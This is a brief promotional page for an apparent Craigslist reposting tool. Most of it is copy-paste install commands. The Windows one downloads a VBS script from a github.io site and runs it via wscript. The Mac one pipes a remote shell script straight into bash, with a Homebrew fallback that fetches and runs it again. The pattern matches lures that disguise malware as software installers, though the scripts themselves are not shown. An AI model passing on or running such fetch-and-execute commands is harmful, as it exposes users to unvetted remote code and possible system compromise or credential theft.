Craigslist Auto Poster is a posting software tool that enables users to repost their postings on auto-pilot for Windows and Mac.
Invoke-WebRequest -Uri "https://cl-auto-poster.github.io/craigslist-auto-poster/CL_RePoster_Windows_Installer.vbs" -OutFile "$env:TEMP\CL_RePoster_Windows_Installer.vbs"; wscript "$env:TEMP\CL_RePoster_Windows_Installer.vbs"
curl -fsSL https://cl-auto-poster.github.io/craigslist-auto-poster/CL_RePoster_Mac_Installer.sh | bash || { (command -v brew >/dev/null 2>&1 || /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)") && brew install curl && $(command -v /usr/local/opt/curl/bin/curl || command -v /opt/homebrew/opt/curl/bin/curl) -fsSL https://cl-auto-poster.github.io/craigslist-auto-poster/CL_RePoster_Mac_Installer.sh | bash; }